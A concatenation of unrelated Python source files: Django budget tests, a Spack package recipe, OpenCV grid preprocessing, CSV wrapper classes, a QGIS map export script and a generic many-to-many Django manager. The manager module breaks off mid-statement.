'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (2019, 2021), False, 'import uuid\n'), ((3694, 3742), 'pytest.raises', 'pytest.raises', (['lambdautils.state.StateTableError'], {}), '(lambdautils.state.StateTableError)\n', (3707, 3742), False, 'import pytest\n'), ((3832, 3880), 'pytest.raises', 'pytest.raises', (['lambdautils.state.StateTableError'], {}), '(lambdautils.state.StateTableError)\n', (3845, 3880), False, 'import pytest\n'), ((3951, 3999), 'pytest.raises', 'pytest.raises', (['lambdautils.state.StateTableError'], {}), '(lambdautils.state.StateTableError)\n', (3964, 3999), False, 'import pytest\n'), ((6354, 6383), 'mock.Mock', 'Mock', ([], {'side_effect': 'raise_error'}), '(side_effect=raise_error)\n', (6358, 6383), False, 'from mock import Mock\n'), ((7499, 7530), 'mock.Mock', 'Mock', ([], {'return_value': 'raven_client'}), '(return_value=raven_client)\n', (7503, 7530), False, 'from mock import Mock\n'), ((7593, 7599), 'mock.Mock', 'Mock', ([], {}), '()\n', (7597, 7599), False, 'from mock import Mock\n'), ((7681, 7710), 'mock.Mock', 'Mock', ([], {'return_value': '"""dummydsn"""'}), "(return_value='dummydsn')\n", (7685, 7710), False, 'from mock import Mock\n'), ((7983, 8006), 'pytest.raises', 'pytest.raises', (['KeyError'], {}), '(KeyError)\n', (7996, 8006), False, 'import pytest\n'), ((241, 263), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (261, 263), False, 'import inspect\n'), ((1657, 1669), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1667, 1669), False, 'import uuid\n'), ((5041, 5058), 'json.dumps', 'json.dumps', (['value'], {}), '(value)\n', (5051, 5058), False, 'import json\n')] |
import os
from testr.packages import make_regress_files
regress_files = ['starcheck.txt',
'starcheck/pcad_att_check.txt']
clean = {'starcheck.txt': [(r'\s*Run on.*[\n\r]*', ''),
(os.environ['SKA'], '')],
'starcheck/pcad_att_check.txt': [(os.environ['SKA'], '')]}
make_regress_files(regress_files, clean=clean)
| [
"testr.packages.make_regress_files"
]
| [((319, 365), 'testr.packages.make_regress_files', 'make_regress_files', (['regress_files'], {'clean': 'clean'}), '(regress_files, clean=clean)\n', (337, 365), False, 'from testr.packages import make_regress_files\n')] |
from django.test import TestCase
from .validators import validate_budget_period
from .models import Budget, Expense, Payment
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
class ExpenseTestCases(TestCase):
def setUp(self) -> None:
user = User.objects.create_user('joe', email='<EMAIL>', password='<PASSWORD>')
budget = Budget.objects.create(name='My budget',
creation_date='2019-05-03',
owner=user,
description='The budget of champions.'
)
Expense.objects.create(name='Water park visit',
amount=30.00,
period='1-monthly',
payee='Super awesome Water parks',
description='I will go to the water park.',
date='2019-06-04',
budget=budget
)
Payment.objects.create(name='Paycheck',
amount=4000.0,
period='1-monthly',
description='Where the Mullah comes from',
date='2017-01-12',
origin='The big boss fom up top in HR.',
budget=budget
)
def test_proper_str_formation(self):
budget = Budget.objects.get(pk=1)
expense = Expense.objects.get(pk=1)
payment = Payment.objects.get(pk=1)
self.assertEquals(budget.__str__(), 'My budget: joe', 'The budget was not created properly.')
self.assertEquals(expense.__str__(), 'Water park visit: 30.0', 'The expense was not create properly.')
self.assertEquals(payment.__str__(), 'Paycheck: 4000.0', 'The string function on payment is not workng properly.')
class BudgetPeriodValidatorTestCase(TestCase):
valid_cases = [
'1-daily',
'1-onetime',
'1-annually',
'5-quarterly',
'7-weekly',
'3-annually',
'10-monthly',
'19-weekly',
'99-daily'
]
invalid_cases = [
'0.4-daily',
'0-weekly',
'ad-annually',
'100-weekly',
'4.6-quarterly',
'-31-daily',
'whoot-quarterly',
'59-zoobly',
'5-onetime',
'03-monthly',
]
def test_budget_period_validator(self):
for c in self.valid_cases:
self.assertEquals(validate_budget_period(c), None, f'failed on {c}')
def test_budget_period_validator_fail(self):
for c in self.invalid_cases:
self.assertRaises(ValidationError, validate_budget_period, c)
def test_validator_in_expense_model_creation_invalid(self):
user = User.objects.create(username='joe', email='<EMAIL>', password='<PASSWORD>')
budget = Budget.objects.create(name='My Budget',
creation_date='2019-04-13',
owner=user,
)
for c in self.invalid_cases:
self.assertRaises(Exception, Expense.objects.create,
name=c + '1',
amount=15.0,
date='2014-05-06',
period=c,
budget=budget
)
| [
"django.contrib.auth.models.User.objects.create",
"django.contrib.auth.models.User.objects.create_user"
]
| [((301, 372), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', (['"""joe"""'], {'email': '"""<EMAIL>"""', 'password': '"""<PASSWORD>"""'}), "('joe', email='<EMAIL>', password='<PASSWORD>')\n", (325, 372), False, 'from django.contrib.auth.models import User\n'), ((2948, 3023), 'django.contrib.auth.models.User.objects.create', 'User.objects.create', ([], {'username': '"""joe"""', 'email': '"""<EMAIL>"""', 'password': '"""<PASSWORD>"""'}), "(username='joe', email='<EMAIL>', password='<PASSWORD>')\n", (2967, 3023), False, 'from django.contrib.auth.models import User\n')] |
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import re
from spack.package import *
class Abacus(MakefilePackage):
"""ABACUS (Atomic-orbital Based Ab-initio Computation at UStc)
is an open-source computer code package aiming
for large-scale electronic-structure simulations
from first principles"""
maintainers = ["bitllion"]
homepage = "http://abacus.ustc.edu.cn/"
git = "https://github.com/abacusmodeling/abacus-develop.git"
url = "https://github.com/abacusmodeling/abacus-develop/archive/refs/tags/v2.2.1.tar.gz"
version("develop", branch="develop")
version(
"2.2.3",
sha256="88dbf6a3bdd907df3e097637ec8e51fde13e2f5e0b44f3667443195481320edf",
)
version(
"2.2.2",
sha256="4a7cf2ec6e43dd5c53d5f877a941367074f4714d93c1977a719782957916169e",
)
version(
"2.2.1",
sha256="14feca1d8d1ce025d3f263b85ebfbebc1a1efff704b6490e95b07603c55c1d63",
)
version(
"2.2.0",
sha256="09d4a2508d903121d29813a85791eeb3a905acbe1c5664b8a88903f8eda64b8f",
)
variant("openmp", default=True, description="Enable OpenMP support")
depends_on("elpa+openmp", when="+openmp")
depends_on("elpa~openmp", when="~openmp")
depends_on("cereal")
depends_on("libxc")
depends_on("fftw")
# MPI is a necessary dependency
depends_on("mpi", type=("build", "link", "run"))
depends_on("mkl")
build_directory = "source"
def edit(self, spec, prefix):
if "+openmp" in spec:
inc_var = "_openmp-"
system_var = (
"ELPA_LIB = -L${ELPA_LIB_DIR} -lelpa_openmp -Wl, -rpath=${ELPA_LIB_DIR}"
)
else:
inc_var = "-"
system_var = (
"ELPA_LIB = -L${ELPA_LIB_DIR} -lelpa -Wl,-rpath=${ELPA_LIB_DIR}"
)
tempInc = (
"\
FORTRAN = ifort\n\
CPLUSPLUS = icpc\n\
CPLUSPLUS_MPI = mpiicpc\n\
LAPACK_DIR = $(MKLROOT)\n\
FFTW_DIR = %s\n\
ELPA_DIR = %s\n\
ELPA_INCLUDE = -I${ELPA_DIR}/include/elpa%s%s\n\
CEREAL_DIR = %s\n\
OBJ_DIR = obj\n\
OBJ_DIR_serial = obj\n\
NP = 14\n"
% (
spec["fftw"].prefix,
spec["elpa"].prefix,
inc_var,
"{0}".format(spec["elpa"].version),
spec["cereal"].prefix,
)
)
with open(self.build_directory + "/Makefile.vars", "w") as f:
f.write(tempInc)
lineList = []
Pattern1 = re.compile("^ELPA_INCLUDE_DIR")
Pattern2 = re.compile("^ELPA_LIB\\s*= ")
with open(self.build_directory + "/Makefile.system", "r") as f:
while True:
line = f.readline()
if not line:
break
elif Pattern1.search(line):
pass
elif Pattern2.search(line):
pass
else:
lineList.append(line)
with open(self.build_directory + "/Makefile.system", "w") as f:
for i in lineList:
f.write(i)
with open(self.build_directory + "/Makefile.system", "a") as f:
f.write(system_var)
def install(self, spec, prefix):
install_tree("bin", prefix.bin)
| [
"re.compile"
]
| [((2657, 2688), 're.compile', 're.compile', (['"""^ELPA_INCLUDE_DIR"""'], {}), "('^ELPA_INCLUDE_DIR')\n", (2667, 2688), False, 'import re\n'), ((2708, 2737), 're.compile', 're.compile', (['"""^ELPA_LIB\\\\s*= """'], {}), "('^ELPA_LIB\\\\s*= ')\n", (2718, 2737), False, 'import re\n')] |
import cv2
import numpy as np
def process_core(image):
'''
Returns an inverted preprocessed binary image, with noise
reduction achieved with greyscaling, Gaussian Blur, Otsu's Threshold, and
an open morph.
'''
#apply greyscaling, Gaussian Blur, and Otsu's Threshold
greyscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(greyscale, (3, 3), 0)
threshold = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]
#apply an open morph to invert image to remove noise
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))
invert = 255 - cv2.morphologyEx(threshold, cv2.MORPH_OPEN, kernel, iterations=1)
return invert
def find_houghlines(image, width, height):
hough_lines = None
lines = cv2.HoughLinesP(image, 1, np.pi/180, 50, minLineLength=50, maxLineGap=5)
#generates blank black image with single color layer
if lines is not None and len(lines) != 0:
hough_lines = np.zeros((height, width), dtype=np.uint8)
for line in lines:
x1, y1, x2, y2 = line[0]
cv2.line(hough_lines, (x1, y1), (x2, y2), (255, 255, 255), 2)
return hough_lines
def find_bounds(image):
rect_bounds = None
#Run contour recognition
contours, _ = cv2.findContours(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
#Take list of sorted contours by largest area to smallest area
#If at least one contour is identified, can process visual approx. of contour bounds
if len(sorted(contours, key=cv2.contourArea, reverse=True)) > 0:
contour_bounds = None
#Pre-determined image size factor constant
SFACTOR = 20
for contour in contours:
#Minimum intended size of a single cell is not reached, likely a cutoff, not worth approx.
if (image[0] * image[1]) / SFACTOR > cv2.contourArea(contour):
break
approximation = cv2.approxPolyDP(contour, cv2.arcLength(contour, True), True)
#This means that the approximated polygon is a quad
if len(approximation) == 4:
contour_bounds = approximation
break
if contour_bounds is not None:
rect_bounds = np.zeros((4, 2), dtype=np.float32)
corners = contour_bounds.reshape(-1, 2)
rect_bounds[0] = corners[np.argmin(contour_bounds.sum(axis=1))]
rect_bounds[2] = corners[np.argmax(contour_bounds.sum(axis=1))]
rect_bounds[1] = corners[np.argmin(np.diff(corners, axis=1))]
rect_bounds[3] = corners[np.argmax(np.diff(corners, axis=1))]
return rect_bounds
#Transform the perspective to render as if looking down on paper (top-down view)
def transform(image, perspective):
pass
#Process the grid based on expected clean binary image input
def process_grid(image, width, height):
grid = None
detected = False
hough_lines = find_houghlines(image, width, height)
| [
"cv2.HoughLinesP",
"cv2.threshold",
"cv2.arcLength",
"cv2.line",
"numpy.diff",
"cv2.contourArea",
"cv2.morphologyEx",
"numpy.zeros",
"cv2.cvtColor",
"cv2.findContours",
"cv2.GaussianBlur",
"cv2.getStructuringElement"
]
| [((308, 347), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2GRAY'], {}), '(image, cv2.COLOR_BGR2GRAY)\n', (320, 347), False, 'import cv2\n'), ((359, 397), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['greyscale', '(3, 3)', '(0)'], {}), '(greyscale, (3, 3), 0)\n', (375, 397), False, 'import cv2\n'), ((561, 610), 'cv2.getStructuringElement', 'cv2.getStructuringElement', (['cv2.MORPH_RECT', '(3, 3)'], {}), '(cv2.MORPH_RECT, (3, 3))\n', (586, 610), False, 'import cv2\n'), ((803, 877), 'cv2.HoughLinesP', 'cv2.HoughLinesP', (['image', '(1)', '(np.pi / 180)', '(50)'], {'minLineLength': '(50)', 'maxLineGap': '(5)'}), '(image, 1, np.pi / 180, 50, minLineLength=50, maxLineGap=5)\n', (818, 877), False, 'import cv2\n'), ((1327, 1394), 'cv2.findContours', 'cv2.findContours', (['image', 'cv2.RETR_EXTERNAL', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n', (1343, 1394), False, 'import cv2\n'), ((414, 482), 'cv2.threshold', 'cv2.threshold', (['blur', '(0)', '(255)', '(cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)'], {}), '(blur, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n', (427, 482), False, 'import cv2\n'), ((630, 695), 'cv2.morphologyEx', 'cv2.morphologyEx', (['threshold', 'cv2.MORPH_OPEN', 'kernel'], {'iterations': '(1)'}), '(threshold, cv2.MORPH_OPEN, kernel, iterations=1)\n', (646, 695), False, 'import cv2\n'), ((1006, 1047), 'numpy.zeros', 'np.zeros', (['(height, width)'], {'dtype': 'np.uint8'}), '((height, width), dtype=np.uint8)\n', (1014, 1047), True, 'import numpy as np\n'), ((1133, 1194), 'cv2.line', 'cv2.line', (['hough_lines', '(x1, y1)', '(x2, y2)', '(255, 255, 255)', '(2)'], {}), '(hough_lines, (x1, y1), (x2, y2), (255, 255, 255), 2)\n', (1141, 1194), False, 'import cv2\n'), ((2339, 2373), 'numpy.zeros', 'np.zeros', (['(4, 2)'], {'dtype': 'np.float32'}), '((4, 2), dtype=np.float32)\n', (2347, 2373), True, 'import numpy as np\n'), ((1923, 1947), 'cv2.contourArea', 'cv2.contourArea', (['contour'], {}), '(contour)\n', (1938, 1947), False, 'import cv2\n'), ((2038, 2066), 'cv2.arcLength', 'cv2.arcLength', (['contour', '(True)'], {}), '(contour, True)\n', (2051, 2066), False, 'import cv2\n'), ((2651, 2675), 'numpy.diff', 'np.diff', (['corners'], {'axis': '(1)'}), '(corners, axis=1)\n', (2658, 2675), True, 'import numpy as np\n'), ((2725, 2749), 'numpy.diff', 'np.diff', (['corners'], {'axis': '(1)'}), '(corners, axis=1)\n', (2732, 2749), True, 'import numpy as np\n')] |
"""
MIT License
Copyright (c) 2018 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import datetime
import csv
import os
class CSVReader(object):
"""Wrapper for reading csv files.
Takes just the filepath as an argument.
Use the iterrecords() generator method for large data sets for increased performance.
"""
def __init__(self, file_path, delimiter=','):
self.file_path = file_path
self.delimiter = delimiter
def read_to_list(self):
"""Returns the records in the csv as a list[]
Each record is a dictionary
"""
records = []
with open(self.file_path) as source:
reader = csv.DictReader(source,
delimiter=self.delimiter)
for row in reader:
records.append(row)
return records
def read_to_dict(self, key_field):
"""Returns the records in the csv as a dictionary.
The key value is specified by the key_field argument for each record
"""
records = {}
with open(self.file_path) as source:
reader = csv.DictReader(source,
delimiter=self.delimiter)
self.headers = reader.fieldnames
if key_field in self.headers:
for row in reader:
if not row[key_field] in records:
records[row[key_field]] = row
else:
raise Exception('The key provided does not have unique values.')
else:
raise KeyError('The key provided does not exist')
return records
def iterrecords(self):
"""Generator method that provides a more efficient way to iterate records.
for record in instance.iterrecords():
print(record)
"""
records = []
with open(self.file_path) as source:
reader = csv.DictReader(source,
delimiter=self.delimiter)
for row in reader:
yield row
class CSVWriter(object):
"""Wrapper for writing csv files.
takes the file path and a list of headers as arguments
"""
def __init__(self, file_path, headers):
self.headers = headers
self.file_path = file_path
def write_from_list(self, records=[]):
"""Writes the csv to the indicated file_path
taking a list[] of records as the argument
where each record is a dictionary.
Only the fields in self.headers will be written to the csv.
But extra fields can be passed, they will just be skipped over.
"""
if isinstance(records, list):
with open(self.file_path, 'w') as csvfile:
writer = csv.DictWriter(csvfile,
fieldnames=self.headers)
writer.writeheader()
for record in records:
if isinstance(record, dict):
row = {field: record[field] for field in self.headers}
writer.writerow(row)
else:
raise Exception('Items in list must be of type dict')
else:
raise Exception('Must pass a list object as the records list')
return self.file_path
def write_from_dict(self, records={}):
"""Writes the csv to the indicated file_path
taking a dict{} of records as the argument
where each item in the dict{} is also a dict{}
"""
with open(self.file_path, 'w') as csvfile:
writer = csv.DictWriter(csvfile,
fieldnames=self.headers)
writer.writeheader()
for key, record in records.items():
row = {field: record[field] for field in self.headers}
writer.writerow(row)
return self.file_path
def reader(file_path='', delimiter=','):
"""Returns a CSVReader object
"""
if os.path.isfile(file_path):
if os.access(file_path, os.R_OK):
return CSVReader(file_path, delimiter=delimiter)
else:
raise Exception('{fname} exists but is not readable.'.format(fname=file_path))
else:
raise Exception('{fname} does not exist'.format(fname=file_path))
def writer(file_path='', headers=[]):
"""Returns a CSVWriter object
"""
if not os.path.isfile(file_path):
if isinstance(headers, list):
return CSVWriter(file_path=file_path, headers=headers)
else:
raise Exception('Headers need to be in a list object.')
else:
raise Exception('{fname} is already a file. Please write to a new location.'.format(fname=file_path))
def the_date():
return datetime.date.today().strftime('%m_%d_%Y')
| [
"csv.DictWriter",
"csv.DictReader",
"os.access",
"os.path.isfile",
"datetime.date.today"
]
| [((5034, 5059), 'os.path.isfile', 'os.path.isfile', (['file_path'], {}), '(file_path)\n', (5048, 5059), False, 'import os\n'), ((5072, 5101), 'os.access', 'os.access', (['file_path', 'os.R_OK'], {}), '(file_path, os.R_OK)\n', (5081, 5101), False, 'import os\n'), ((5445, 5470), 'os.path.isfile', 'os.path.isfile', (['file_path'], {}), '(file_path)\n', (5459, 5470), False, 'import os\n'), ((1667, 1715), 'csv.DictReader', 'csv.DictReader', (['source'], {'delimiter': 'self.delimiter'}), '(source, delimiter=self.delimiter)\n', (1681, 1715), False, 'import csv\n'), ((2117, 2165), 'csv.DictReader', 'csv.DictReader', (['source'], {'delimiter': 'self.delimiter'}), '(source, delimiter=self.delimiter)\n', (2131, 2165), False, 'import csv\n'), ((2942, 2990), 'csv.DictReader', 'csv.DictReader', (['source'], {'delimiter': 'self.delimiter'}), '(source, delimiter=self.delimiter)\n', (2956, 2990), False, 'import csv\n'), ((4638, 4686), 'csv.DictWriter', 'csv.DictWriter', (['csvfile'], {'fieldnames': 'self.headers'}), '(csvfile, fieldnames=self.headers)\n', (4652, 4686), False, 'import csv\n'), ((5814, 5835), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (5833, 5835), False, 'import datetime\n'), ((3790, 3838), 'csv.DictWriter', 'csv.DictWriter', (['csvfile'], {'fieldnames': 'self.headers'}), '(csvfile, fieldnames=self.headers)\n', (3804, 3838), False, 'import csv\n')] |
from PyQt4.QtGui import QImage, QPainter
from PyQt4.QtCore import QSize
# configure the output image
width = 800
height = 600
dpi = 92
img = QImage(QSize(width, height), QImage.Format_RGB32)
img.setDotsPerMeterX(dpi / 25.4 * 1000)
img.setDotsPerMeterY(dpi / 25.4 * 1000)
# get the map layers and extent
layers = [ layer.id() for layer in iface.legendInterface().layers() ]
extent = iface.mapCanvas().extent()
# configure map settings for export
mapSettings = QgsMapSettings()
mapSettings.setMapUnits(0)
mapSettings.setExtent(extent)
mapSettings.setOutputDpi(dpi)
mapSettings.setOutputSize(QSize(width, height))
mapSettings.setLayers(layers)
mapSettings.setFlags(QgsMapSettings.Antialiasing | QgsMapSettings.UseAdvancedEffects | QgsMapSettings.ForceVectorOutput | QgsMapSettings.DrawLabeling)
# configure and run painter
p = QPainter()
p.begin(img)
mapRenderer = QgsMapRendererCustomPainterJob(mapSettings, p)
mapRenderer.start()
mapRenderer.waitForFinished()
p.end()
# save the result
img.save("C:/temp/custom_export.png","png") | [
"PyQt4.QtGui.QPainter",
"PyQt4.QtCore.QSize"
]
| [((845, 855), 'PyQt4.QtGui.QPainter', 'QPainter', ([], {}), '()\n', (853, 855), False, 'from PyQt4.QtGui import QImage, QPainter\n'), ((154, 174), 'PyQt4.QtCore.QSize', 'QSize', (['width', 'height'], {}), '(width, height)\n', (159, 174), False, 'from PyQt4.QtCore import QSize\n'), ((606, 626), 'PyQt4.QtCore.QSize', 'QSize', (['width', 'height'], {}), '(width, height)\n', (611, 626), False, 'from PyQt4.QtCore import QSize\n')] |
from django.db import router
from django.db.models import Q, Manager
from django.db import connections
from .contenttypes import ct, get_content_type
from .query import GM2MTgtQuerySet
class GM2MBaseManager(Manager):
use_in_migration = True
def __init__(self, instance):
super(GM2MBaseManager, self).__init__()
self.model = self._model # see create_gm2m_related_manager
self.instance = instance
self.pk = instance.pk
self.core_filters = {}
def get_queryset(self):
try:
return self.instance \
._prefetched_objects_cache[self.prefetch_cache_name]
except (AttributeError, KeyError):
db = self._db or router.db_for_read(self.instance.__class__,
instance=self.instance)
return self._get_queryset(using=db)._next_is_sticky() \
.filter(**self.core_filters)
def _get_queryset(self, using):
return super(GM2MBaseManager, self).get_queryset().using(using)
def get_prefetch_queryset(self, instances, queryset=None):
db = self._db or router.db_for_read(self.model,
instance=instances[0])
if queryset is None:
queryset = self._get_queryset(db)
qs, rel_obj_attr, instance_attr = \
self._get_prefetch_queryset_params(instances, queryset, db)
return (qs,
rel_obj_attr,
instance_attr,
False,
self.prefetch_cache_name)
def _get_extra_queryset(self, queryset, q, extra_fields, db):
join_table = self.through._meta.db_table
connection = connections[db]
qn = connection.ops.quote_name
extra = dict(select=dict(
('_prefetch_related_val_%s' % f.attname,
'%s.%s' % (qn(join_table), qn(f.column)))
for f in extra_fields))
return queryset.using(db)._next_is_sticky().filter(q).extra(**extra)
def _check_through_model(self, method_name):
# If the GM2M relation has an intermediary model,
# the add and remove methods are not available.
if not self.through._meta.auto_created:
opts = self.through._meta
raise AttributeError(
'Cannot use %s() on a ManyToManyField which specifies an '
'intermediary model. Use %s.%s\'s Manager instead.'
% (method_name, opts.app_label, opts.object_name))
def _do_add(self, db, through_objs):
"""
Performs items addition
"""
# Add the new entries in the db table
self.through._default_manager.using(db).bulk_create(through_objs)
def add(self, *objs):
"""
Adds objects to the GM2M field
:param *objs: object instances to add
"""
#
self._check_through_model('add')
if not objs:
return
db = router.db_for_write(self.through, instance=self.instance)
self._do_add(db, self._to_add(objs, db))
add.alters_data = True
def _do_remove(self, db, q):
"""
Perfoms items removal from a Q object
"""
self.through._default_manager.using(db).filter(q).delete()
def remove(self, *objs):
"""
Removes objects from the GM2M field
"""
# *objs - objects to remove
self._check_through_model('remove')
if not objs:
return
db = router.db_for_write(self.through, instance=self.instance)
self._do_remove(db, self._to_remove(objs))
remove.alters_data = True
def _do_clear(self, db, filter=None):
self.through._default_manager.using(db).filter(**(filter or {})) \
.delete()
def set(self, objs, **kwargs):
"""
Sets the objs iterable as the set of related objects
(Added for compatibility with Django 1.9)
"""
self._check_through_model('set')
objs = tuple(objs)
clear = kwargs.pop('clear', False)
db = router.db_for_write(self.through, instance=self.instance)
if clear:
# clears all and re-adds
self._do_clear(db)
self._do_add(db, *objs)
else:
# just removes the necessary items and adds the missing ones
to_add, to_remove = self._to_change(objs, db)
self._do_remove(db, to_remove)
self._do_add(db, to_add)
set.alters_data = True
def clear(self):
db = router.db_for_write(self.through, instance=self.instance)
self._do_clear(db, self._to_clear())
clear.alters_data = True
class GM2MBaseSrcManager(Manager):
def __init__(self, instance):
# the manager's model is the source model
super(GM2MBaseSrcManager, self).__init__(instance)
self.core_filters['%s__%s' % (self.query_field_name,
self.field_names['tgt_ct'])] = \
get_content_type(self.instance)
self.core_filters['%s__%s' % (self.query_field_name,
self.field_names['tgt_fk'])] = \
self.instance.pk
def _get_prefetch_queryset_params(self, instances, queryset, db):
# we're looking for generic target instances, which should be
# converted to (content_type, primary_key) tuples
q = Q()
for obj in instances:
q = q | Q(**{
'%s__%s' % (self.query_field_name,
self.field_names['tgt_ct']):get_content_type(obj),
'%s__%s' % (self.query_field_name,
self.field_names['tgt_fk']): obj.pk
})
# Annotating the query in order to retrieve the primary model
# content type and id in the same query
# content type must be the 1st element, see rel_obj_attr below
extra_fields = (
self.through._meta.get_field(self.field_names['tgt_ct']),
self.through._meta.get_field(self.field_names['tgt_fk'])
)
qs = self._get_extra_queryset(queryset, q, extra_fields, db)
# primary model retrieval function
def rel_obj_attr(relobj):
t = []
for f in extra_fields:
try:
# t already contains the content type id
# we use get_for_id to retrieve the cached content type
model = ct.ContentType.objects.get_for_id(t[0]) \
.model_class()
except IndexError:
# t is empty
model = ct.ContentType
t.append(model._meta.pk.to_python(
getattr(relobj, '_prefetch_related_val_%s' % f.attname)
))
return tuple(t)
# model attribute retrieval function
instance_attr = lambda inst: \
(get_content_type(inst).pk, inst.pk)
return qs, rel_obj_attr, instance_attr
def _to_add(self, objs, db):
# we're using the reverse relation to add source model
# instances
inst_ct = get_content_type(self.instance)
vals = self.through._default_manager.using(db) \
.values_list(self.field_names['src'],
flat=True) \
.filter(**{
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
})
to_add = []
for obj in objs:
if obj.pk not in vals:
to_add.append(self.through(**{
'%s_id' % self.field_names['src']:
obj.pk,
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
}))
return to_add
def _to_remove(self, objs):
# we're using the reverse relation to delete source model
# instances
inst_ct = get_content_type(self.instance)
return Q(**{
'%s_id__in' % self.field_names['src']:
[obj.pk for obj in objs],
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
})
def _to_change(self, objs, db):
"""
Returns the sets of items to be added and a Q object for removal
"""
inst_ct = get_content_type(self.instance)
vals = list(self.through._default_manager.using(db)
.values_list(self.field_names['src'], flat=True)
.filter(**{
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
}))
to_add = set()
to_remove = set()
for obj in objs:
try:
vals.remove(obj.pk)
except ValueError:
# obj.pk is not in vals and must be added
to_add.add(self.through(**{
'%s_id' % self.field_names['src']:
obj.pk,
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
}))
for v in vals:
to_remove.add(v)
return to_add, Q(pk__in=to_remove)
def _to_clear(self):
return {
self.field_names['tgt_ct']: get_content_type(self.instance),
self.field_names['tgt_fk']: self.instance.pk
}
class GM2MBaseTgtManager(Manager):
def __init__(self, instance):
# the manager's model is the through model
super(GM2MBaseTgtManager, self).__init__(instance)
source_field = self.through._meta.get_field(
self.field_names['src'])
self.source_related_fields = source_field.related_fields
for __, rh_field in self.source_related_fields:
key = '%s__%s' % (self.query_field_name, rh_field.name)
self.core_filters[key] = getattr(self.instance,
rh_field.attname)
def _get_queryset(self, using):
return GM2MTgtQuerySet(self.model, using=using)
def _get_prefetch_queryset_params(self, instances, queryset, db):
# we're looking for through model instances
query = {}
for lh_field, rh_field in self.source_related_fields:
query['%s__in' % lh_field.name] = \
set(getattr(obj, rh_field.attname)
for obj in instances)
q = Q(**query)
# Annotating the query in order to retrieve the primary model
# id in the same query
fk = self.through._meta.get_field(self.field_names['src'])
extra_fields = fk.local_related_fields
qs = self._get_extra_queryset(queryset, q, extra_fields, db)
# marking the queryset so that the original queryset should
# be returned when evaluated the first time
qs._related_prefetching = True
# primary model retrieval function
def rel_obj_attr(relobj):
t = []
for f in extra_fields:
v = getattr(relobj,
'_prefetch_related_val_%s' % f.attname)
try:
v = v.pop()
except AttributeError: # v is not a list
pass
t.append(f.related_model._meta.pk.to_python(v))
return tuple(t)
# model attribute retrieval function
select_fields = fk.foreign_related_fields
instance_attr = lambda inst: tuple([getattr(inst, f.attname)
for f in select_fields])
return qs, rel_obj_attr, instance_attr
def _to_add(self, objs, db):
models = []
objs_set = set()
for obj in objs:
# extract content type and primary key for each object
objs_set.add((get_content_type(obj),
obj.pk))
m = obj.__class__
if m not in models:
# call field.add_relation for each model
models.append(m)
self.field.add_relation(m, auto=True)
vals = self.through._default_manager.using(db) \
.filter(**{self.field_names['src']: self.pk}) \
.values_list(self.field_names['tgt_ct'],
self.field_names['tgt_fk'])
to_add = []
for ct, pk in objs_set.difference(vals):
to_add.append(self.through(**{
'%s_id' % self.field_names['src']: self.pk,
self.field_names['tgt_ct']: ct,
self.field_names['tgt_fk']: pk
}))
return to_add
def _to_remove(self, objs):
q = Q()
for obj in objs:
# Convert the obj to (content_type, primary_key)
q = q | Q(**{
self.field_names['tgt_ct']: get_content_type(obj),
self.field_names['tgt_fk']: obj.pk
})
return q & Q(**{
'%s_id' % self.field_names['src']: self.pk
})
def _to_clear(self):
return {
'%s_id' % self.field_names['src']: self.pk
}
def _to_change(self, objs, db):
"""
Returns the sets of items to be added and a Q object for removal
"""
to_add = set()
src_fname = self.field_names['src']
ct_fname = self.field_names['tgt_ct']
fk_fname = self.field_names['tgt_fk']
vals = list(self.through._default_manager.using(db)
.filter(**{self.field_names['src']: self.pk})
.values_list(ct_fname, fk_fname))
known_cts = set(v[0] for v in vals)
for obj in objs:
ct = get_content_type(obj)
val = (ct, obj.pk)
try:
vals.remove(val)
except ValueError:
# val is not in vals
# extract content type and primary key for each object
to_add.add((ct, obj.pk))
if ct.pk not in known_cts:
# call field.add_relation for each unknown model
self.field.add_relation(obj.__class__, auto=True)
known_cts.add(ct.pk)
rem_q = Q()
for val in vals:
# Convert the obj to (content_type, primary_key)
rem_q = rem_q | Q(**{
ct_fname: val[0],
fk_fname: val[1]
})
return [
self.through(**{
